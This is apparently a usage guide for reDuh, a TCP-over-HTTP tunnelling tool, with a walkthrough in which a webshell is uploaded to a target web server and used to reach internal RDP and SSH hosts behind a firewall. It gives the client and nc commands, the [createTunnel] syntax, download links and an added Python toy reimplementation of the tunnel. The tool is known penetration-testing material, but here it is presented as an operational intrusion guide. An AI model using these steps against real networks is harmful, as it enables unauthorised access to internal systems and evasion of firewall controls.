
reDuh usage

reDuh

  • Authors: Haroon Meer, Marco Slaviero, Glenn Wilkonson (reDuhClient && JSP), Gert Burger (PHP), Ian de Villiers (ASPX)
  • Cost: Free
  • Source Code: GitHub
  • Version : 0.3
  • License : GPL
  • Release Date : 2008/07/29
  • Recent Changes : Fixed issues with PHP version and older versions of PHP

reDuh was released as part of SensePost's BlackHat USA 2008 talk on tunnelling data in and out of networks.

reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts behind that server trivially.

Example scenario

While the original documentation made heavy use of bad ASCII art, we had to have prettier pics for the .ppt, so here you go:

  1. Glenn has the ability to upload/create a JSP page on the remote server.
  2. Glenn wishes to make an RDP connection to the server term-serv.victim.com (visible to the web-server behind the firewall).
  3. The firewall permits HTTP traffic to the web server but denies everything else.
  4. Glenn uploads reDuh.jsp to http://ubuntoo.victim.com/uploads/reDuh.jsp.
  5. Glenn runs reDuhClient on his machine and points it to the page: $ java reDuhClient ubuntoo.victim.com 80 /uploads/reDuh.jsp
  6. Glenn administers reDuhClient by connecting to its management port (1010 by default).
  7. Once connected, Glenn types: [createTunnel]1234:term-serv.victim.com:3389
  8. Now Glenn launches his RDP client and aims it at localhost:1234. reDuhClient and reDuh.jsp will happily shunt TCP until they are killed.

The system can handle multiple connections, so while RDP is running, we can use the management connection (on port 1010) again, and request [createTunnel]5555:sshd.victim.com:22. Glenn can now ssh to localhost on port 5555 to access the sshd on sshd.victim.com (while still running his RDP session).

  1. Behind the scenes, reDuhClient starts listening on 1234 and sends an HTTP message to /uploads/reDuh.jsp which opens a socket to term-serv.victim.com:3389.
  2. Any traffic sent to the local socket on 1234 is encoded, and wrapped in HTTP requests and is sent to /uploads/reDuh.jsp.
  3. Any traffic from term-serv.victim.com:3389 to the JSP is placed in a queue and sent back to reDuhClient when it requests it.
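The three "behind the scenes" steps above (and the scenario steps 5 to 8 they explain) are easier to see in code than in prose. The following is an added example written for this page, not reDuh's own client or JSP and not its wire protocol: it runs a stand-in "page" (the role of reDuh.jsp), a local listener that plays reDuhClient, and a stand-in internal service (the role of term-serv.victim.com, here simply upper-casing what it receives) all on loopback in one process. The `action`/`host`/`port`/`id`/`data` form fields, the `page_call`, `create_tunnel` and `demo` names, and the polling interval are assumptions for the demo; only the structure (create a socket on the server, push bytes in POSTs, poll for queued bytes coming back) is what the list describes.

```python
# Toy TCP-over-HTTP tunnel in the style of reDuh. Added illustration only: not reDuh's own
# code or wire protocol; the action/host/port/id/data form fields are invented for the demo.
import base64
import select
import socket
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

TUNNELS = {}   # tunnel id -> socket to the internal host; lives inside the "page"

class TunnelPage(BaseHTTPRequestHandler):
    """Role of reDuh.jsp: open sockets and relay bytes on the client's behalf."""
    def log_message(self, *args):   # keep the demo quiet
        pass

    def do_POST(self):
        q = urllib.parse.parse_qs(self.rfile.read(int(self.headers["Content-Length"])).decode())
        act = q["action"][0]
        if act == "create":     # open a socket to host:port behind the firewall
            s = socket.create_connection((q["host"][0], int(q["port"][0])), timeout=5)
            TUNNELS[str(s.fileno())] = s            # fileno is a good-enough id for a toy
            body = str(s.fileno()).encode()
        elif act == "send":     # bytes from the client's local socket -> internal host
            TUNNELS[q["id"][0]].sendall(base64.b64decode(q["data"][0]))
            body = b"ok"
        elif act == "recv":     # whatever the internal host sent back, or nothing (polling)
            s = TUNNELS[q["id"][0]]
            body = base64.b64encode(s.recv(65536) if select.select([s], [], [], 0)[0] else b"")
        else: body = b"bad action"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

def page_call(url, **fields):
    """Role of reDuhClient's transport: one tunnel operation per well-formed HTTP POST."""
    data = urllib.parse.urlencode(fields).encode()
    with urllib.request.urlopen(url, data=data, timeout=5) as resp:
        return resp.read()

def forward_connection(local_sock, url, host, port):
    """Relay one accepted local connection through the page to host:port."""
    try:
        tid = page_call(url, action="create", host=host, port=str(port)).decode()
        local_sock.settimeout(0.05)   # short timeout so we alternate between send and poll
        while True:
            try:
                chunk = local_sock.recv(4096)
                if not chunk: break   # local client closed
                page_call(url, action="send", id=tid, data=base64.b64encode(chunk).decode())
            except socket.timeout: pass
            back = base64.b64decode(page_call(url, action="recv", id=tid))
            if back:
                local_sock.sendall(back)
    except OSError: pass              # page unreachable or local socket gone: give up quietly
    finally:
        local_sock.close()

def create_tunnel(local_port, url, host, port):
    """Equivalent of '[createTunnel]local_port:host:port' typed on the management port."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", local_port)); listener.listen(5)
    def accept_loop():
        while True:
            conn, _ = listener.accept()
            threading.Thread(target=forward_connection, args=(conn, url, host, port),
                             daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return listener

def start_internal_service():
    # Stand-in for the host behind the firewall: it upper-cases whatever it receives.
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0)); srv.listen(5)
    def serve():
        while True:
            conn, _ = srv.accept()
            for data in iter(lambda: conn.recv(4096), b""):
                conn.sendall(data.upper())
            conn.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def demo(payload=b"hello through the tunnel"):
    # Run page, client and internal service on loopback; return what came back through the tunnel.
    internal_port = start_internal_service()
    httpd = ThreadingHTTPServer(("127.0.0.1", 0), TunnelPage)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    url = "http://127.0.0.1:%d/uploads/reDuh.jsp" % httpd.server_address[1]
    listener = create_tunnel(0, url, "127.0.0.1", internal_port)   # port 0: any free port
    client = socket.create_connection(("127.0.0.1", listener.getsockname()[1]), timeout=5)
    client.sendall(payload)
    out = b""
    while len(out) < len(payload):
        out += client.recv(4096)
    client.close()
    httpd.shutdown()
    return out
```

Calling `demo()` returns the payload upper-cased, which can only have happened if the bytes went local socket -> HTTP POST -> page -> internal service and back the same way. What the toy leaves out, and what the real tool adds: a management port (1010) with the `[createTunnel]` command parser, HTTPS, a server-side queue that survives between polls rather than a one-shot `recv`, and of course the page itself being uploaded to a remote web server instead of started in-process. The slowness noted later on this page follows directly from the structure shown here: every byte in either direction costs at least one full HTTP round trip, and data coming back waits for the next poll.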

Disclaimer: The JSP version of reDuh is the most deployed/used/tested version. ASPX and PHP ports were done for completeness (but not extensively tested). Please let us know if you have any bug reports on any of these tools.

 

This is the work of a foreign expert; I just wrote a quick usage guide along the way. If your English is good, read the original: http://www.sensepost.com/research/reDuh/

This tool forwards a port on an internal-network server to your own machine through an HTTP/HTTPS tunnel, forming a connected circuit. It is used to reach ports that are open on the target server's internal side when the target sits on an internal network or behind a port-filtering policy.

Local machine-------client---------(HTTP tunnel)-----------server side------------------internal server

The server side is a webshell (three versions, aspx, php and jsp, for different server types); the client is written in Java, so it is best to install a JDK on the local machine.

Unpack the client files; here I put them in the TEST folder on drive E.

Figure 01

Upload the server-side webshell to the target server.

Figure 02

The target server is on an internal network and has Terminal Services enabled.

Figure 03

From the command line, connect the client to the server side:

E:\test>java reDuhClient <target-server-hostname> http 80 /<webshell-path>/reDuh.aspx

Figure 04

Open a new command prompt and connect to local port 1010 with nc.

H:\>nc -vv localhost 1010

Figure 05

A welcome banner appears once the connection succeeds; then enter the command:

>>[createTunnel]1234:127.0.0.1:3389

The leading 1234 is the port you will connect to on your own machine; the IP address in the middle is the target server's (either the server hosting the webshell or another server on the same internal network); the trailing 3389 is the port on that target you want to reach.

On success, both command windows print a success message.

Figure 06

Figure 07

The tunnel is now established; connecting to port 1234 on your own machine is the same as connecting to port 3389 on the target server.

Figure 08

Figure 09

How the data travels

Figure 10

Note that forwarding data through this tool is very slow; when connecting, turn mstsc's colour depth down as far as possible.

reDuh client download: reDuhClient-0.3.zip    http://www.sensepost.com/research/reDuh/reDuhClient-0.3.zip
reDuh server download: reDuh-server-all.tgz   http://www.sensepost.com/research/reDuh/reDuh-server-all.tgz

 
